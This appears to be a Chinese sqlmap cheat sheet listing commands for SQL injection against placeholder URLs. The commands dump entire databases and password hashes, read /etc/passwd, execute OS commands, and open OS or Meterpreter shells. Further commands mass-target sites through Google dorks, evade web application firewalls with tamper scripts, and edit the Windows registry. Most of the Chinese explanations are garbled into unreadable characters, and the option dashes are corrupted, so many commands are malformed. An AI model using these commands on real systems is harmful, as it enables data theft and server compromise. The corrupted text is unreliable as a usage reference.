sqlmapעʹ÷
һ̳ܲʹɽע룬ʵû취 ʱѧϰ¹sqlmapʹ÷ֱ¼sqlmap -u http://url/news?id=1 Ccurrent-user #ȡǰûsqlmap -u http://www.xxoo.com/news?id=1 Ccurrent-db #ȡǰ ݿ
sqlmap -u http://www.xxoo.com/news?id=1 Ctables -D db_name#
sqlmap -u http://url/news?id=1 Ccolumns -T tablenameusers-D db_name-v 0 #ֶ
sqlmap-uhttp://url/news?id=1Cdump-Ccolumn_name-T table_name-D db_name-v
0 #ȡֶ
******************Ϣȡ******************
sqlmap -u http://url/news?id=1 Cdbms Mysql Cusers # dbms ָ ݿ
sqlmap -u http://url/news?id=1 Cusers #ݿû
sqlmap -u http://url/news?id=1 Cdbs#ݿ
sqlmap -u http://url/news?id=1 Cpasswords #ݿû
sqlmap -u http://url/news?id=1 Cpasswords-U root -v 0 #гָû ݿ
sqlmap-uhttp://url/news?id=1 Cdump-Cpassword,user,id-T tablename-D db_name
Cstart 1 Cstop 20 #гֶָΣг20
sqlmap -u http://url/news?id=1 Cdump-all -v 0 #гݿб
sqlmap -u http://url/news?id=1 Cprivileges #鿴Ȩ
sqlmap -u http://url/news?id=1 Cprivileges -U root #鿴ָûȨsqlmap -u http://url/news?id=1 Cis-dba -v 1 #ǷݿԱsqlmap -u http://url/news?id=1 Croles #öݿûɫ
sqlmap -u http://url/news?id=1 Cudf-inject #ûԶ庯ȡ ϵͳȨޣ
sqlmap -u http://url/news?id=1 Cdump-all Cexclude-sysdbs -v 0 # ǰб
sqlmap -u http://url/news?id=1 Cunion-cols #union ѯ¼
sqlmap -u http://url/news?id=1 Ccookie COOKIE_VALUE#cookieע
sqlmap -u http://url/news?id=1-b #ȡbannerϢ
sqlmap -u http://url/news?id=1 Cdata id=3#postע
sqlmap -u http://url/news?id=1-v 1 -f #ָбݿ
sqlmap -u http://url/news?id=1 Cproxyhttp://127.0.0.1:8118 #ע
sqlmap -u http://url/news?id=1CstringSTRING_ON_TRUE_PAGE# ָ ؼ
sqlmap -u http://url/news?id=1 Csql-shell #ִָsql
sqlmap -u http://url/news?id=1 Cfile /etc/passwd
sqlmap -u http://url/news?id=1 Cos-cmd=whoami #ִϵͳ
sqlmap -u http://url/news?id=1 Cos-shell #ϵͳshell sqlmap -u http://url/news?id=1 Cos-pwn #shell
sqlmap -u http://url/news?id=1 Creg-read #ȡwinϵͳע
sqlmap -u http://url/news?id=1 Cdbs-o sqlmap.log#
sqlmap -u http://url/news?id=1 Cdbs -o sqlmap.log Cresume #ָ ѱ
***********÷*************
-p name index.php?n_id=1&name=2&data=2020 ָnameע
sqlmap -g google Cdump-all Cbatch #googleעԶ ܳ ֶ 豣֤google.com
Ctechnique ָע\ʹõļ
ӲĬϲע뼼
• B: ڲSQL äע
• E: Դsql ע
• U: UNION ע
• S: sql ע
• T: ʱäע
Ctamper ͨƹWEB ǽWAFSqlmap Ĭchar()
Ctamper Ŀ¼
\sqlmap-dev\tamper
sqlmap -u http:// www.2cto.com /news?id=1 Csmart Clevel 3 Cusers # smart
level ִвԵȼ ʵ:
Sqlmap -u http://url/news?id=1&Submit=Submit
Ccookie=PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406 Cstring=Surname Cdbms=mysql Cuser
Cpassword
οĵ:http://sqlmap.sourceforge.net/doc/README.html
***********װ°汾*************
ubuntu ͨapt-get install װsqlmap汾Ϊ0.6 ͨsvn װ Ϊ 1.0
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
װλΪ:/home/ǰû/sqlmap-dev/sqlmap.py ֱִ/home/ǰû/sqlmap-dev/sqlmap.py Cversion ܲ ǿ.bashrc ļ
sudo vim /home/ǰû/.bashrc
#λüϣ
alias sqlmap=python /home/seclab/sqlmap-dev/sqlmap.py ûֻԵǰûЧ
ûЧ ȫ ༭ļ
vim /etc/profile
ͬϣ
alias sqlmap=python /home/seclab/sqlmap-dev/sqlmap.py Ч
******************windows 7 (x64) sqlmap install (SVN)************
http://www.python.org/getit/ װpython
http://www.sliksvn.com/en/download װwindows svn client
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
װsqlmap
*Ļ
Cversion ʾİ汾Ų˳
-h, Chelp ʾ˰Ϣ˳
-v VERBOSE ϸ0-6ĬΪ1
TargetĿ꣩ ҪһѡĿURL
-d DIRECT ֱӵݿ⡣
-u URL, Curl=URL ĿURL
-l LIST Burp WebScarab ־нĿꡣ
-r REQUESTFILE һļHTTP
-g GOOGLEDORK Google dork ĽΪĿURL
-c CONFIGFILE INI ļмѡ
Request:
ЩѡָӵĿURL
Cdata=DATA ͨPOST ͵ַ
Ccookie=COOKIE HTTP Cookie ͷ
Ccookie-urlencodeURL ɵcookie ע
Cdrop-set-cookie ӦSet CCookie ͷϢ
Cuser-agent=AGENTָHTTP User CAgent ͷ
Crandom-agent ʹѡHTTP User CAgent ͷ
Creferer=REFERER ָHTTP Referer ͷ
Cheaders=HEADERS зֿHTTP ͷ
Cauth-type=ATYPE HTTP ֤ͣժҪNTLM(Basic, Digest or NTLM)
Cauth-cred=ACRED HTTP ֤ƾݣû:룩
Cauth-cert=ACERT HTTP ֤֤飨key_filecert_file
Cproxy=PROXY ʹHTTP ӵĿURL
Cproxy-cred=PCREDHTTP ֤ƾݣû룩
Cignore-proxy ϵͳĬϵHTTP
Cdelay=DELAY ÿHTTP ֮ӳʱ䣬λΪ
Ctimeout=TIMEOUT ȴӳʱʱ䣨ĬΪ30 룩
Cretries=RETRIES ӳʱӵʱ䣨Ĭ3
Cscope=SCOPE ṩĴ־йĿʽ
Csafe-url=SAFURL ڲԹоʵurl ַ
Csafe-freq=SAFREQη֮ȫURL
OptimizationŻ ЩѡŻSqlMap ܡ
-o Ż
Cpredict-output ԤⳣIJѯ
Ckeep-alive ʹó־õHTTPS
Cnull-connection ûʵʵHTTP Ӧмҳ泤
Cthreads=THREADS HTTPSĬΪ1
Injectionע룩
ЩѡָЩṩԶעpayloads Ϳѡ۸Ľű
-p TESTPARAMETER ɲԵIJS
Cdbms=DBMS ǿƺ˵DBMS Ϊֵ
Cos=OS ǿƺ˵DBMS ϵͳΪֵ
Cprefix=PREFIX עpayload ַǰ
Csuffix=SUFFIX ע payload ַ
Ctamper=TAMPER ʹøĽűS۸ע
Detection⣩
ЩѡָSQL äעʱνͱȽHTTP Ӧҳݡ
Clevel=LEVEL ִвԵĵȼ1-5ĬΪ1
Crisk=RISK ִвԵķգ0-3ĬΪ1
Cstring=STRING ѯʱЧʱҳƥַ
Cregexp=REGEXP ѯʱЧʱҳƥʽ
Ctext-only ıݱȽҳ
Techniquesɣ ЩѡڵSQL עԡ
Ctechnique=TECH SQL ע뼼ԣĬBEUST
Ctime-sec=TIMESECDBMS Ӧӳʱ䣨ĬΪ5 룩
Cunion-cols=UCOLSзΧڲUNION ѯע
Cunion-char=UCHARڱ½ַ
Fingerprintָƣ
-f, Cfingerprint ִм㷺DBMS 汾ָ
Enumerationö٣
ЩѡоٺݿϵͳϢеĽṹݡ⣬Լ SQL 䡣
-b, Cbanner ݿϵͳıʶ
Ccurrent-user ݿϵͳǰû
Ccurrent-db ݿϵͳǰݿ
Cis-dba DBMS ǰûǷDBA
Cusers öݿϵͳû
Cpasswords öݿϵͳûϣ
Cprivileges öݿϵͳûȨ
Croles öݿϵͳûĽɫ
Cdbs öݿϵͳݿ
Ctables öٵDBMS ݿеı
Ccolumns öDBMS ݿ
Cdump תݿϵͳݿеı
Cdump-all תеDBMS ݿеĿ
Csearch УSS/ݿƣS
-D DB Ҫöٵݿ
-T TBL Ҫöٵݿ
-C COL Ҫöٵݿ
-U USER öٵݿû
Cexclude-sysdbs öٱʱųϵͳݿ
Cstart=LIMITSTARTһѯ
Cstop=LIMITSTOP ѯ
Cfirst=FIRSTCHAR һѯֵַ
Clast=LASTCHAR ѯַ
Csql-query=QUERY ҪִеSQL
Csql-shell ʾʽSQL shell
Brute force ЩѡԱ顣
Ccommon-tables ڹͬ
Ccommon-columns ڹͬ
User-defined function injectionûԶ庯ע룩 ЩѡûԶ庯
Cudf-inject עûԶ庯
Cshared-lib=SHLIBı·
File system accessļϵͳ ЩѡԱʺݿϵͳĵײļϵͳ
Cfile-read=RFILE Ӻ˵ݿϵͳļϵͳȡļ
Cfile-write=WFILE༭˵ݿϵͳļϵͳϵıļ
Cfile-dest=DFILE ˵ݿϵͳдļľ·
Operating system accessϵͳʣ Щѡڷʺݿϵͳĵײϵͳ
Cos-cmd=OSCMD ִвϵͳ
Cos-shell ʽIJϵͳshell
Cos-pwn ȡһOOB shellmeterpreter VNC
Cos-smbrelay һȡһOOB shellmeterpreter VNC
Cos-bof 洢̻
Cpriv-esc ݿûȨ
Cmsf-path=MSFPATHMetasploit Framework صİװ·
Ctmp-path=TMPPATHԶʱļĿ¼ľ·
Windows עʣ ЩѡԱʺݿϵͳWindows ע
Creg-read һWindows עֵ
Creg-add дһWindows עֵ
Creg-del ɾWindows עֵ
Creg-key=REGKEY Windows ע
Creg-value=REGVALWindows עֵ
Creg-data=REGDATAWindows עֵ
Creg-type=REGTYPEWindows עֵ
Generalһ㣩 ЩѡһЩһĹ
-t TRAFFICFILE ¼HTTP һıļ
-s SESSIONFILE ͻָỰļ
Cflush-session ˢµǰĿĻỰļ
Cfresh-queries ڻỰļд洢IJѯ
Ceta ʾÿԤƵʱ
Cupdate SqlMap
Csave file ѡINI ļ
Cbatch Ӳѯû룬ʹĬá
Miscellaneous
Cbeep SQL עʱ
Ccheck-payload IDS עpayloads ļ
Ccleanup SqlMap UDF ͱDBMS
Cforms ĿURL ĽͲʽ
Cgpage=GOOGLEPAGEָҳʹùȸdork
Cpage-rank Google dork ʾҳPR
Cparse-errors ӦҳݿϵͳĴϢ
Creplicate תݵһsqlite3 ݿ
Ctor ʹĬϵTorVidalia/ Privoxy/ Polipoַ
Cwizard ûļ
ҳ:
[1]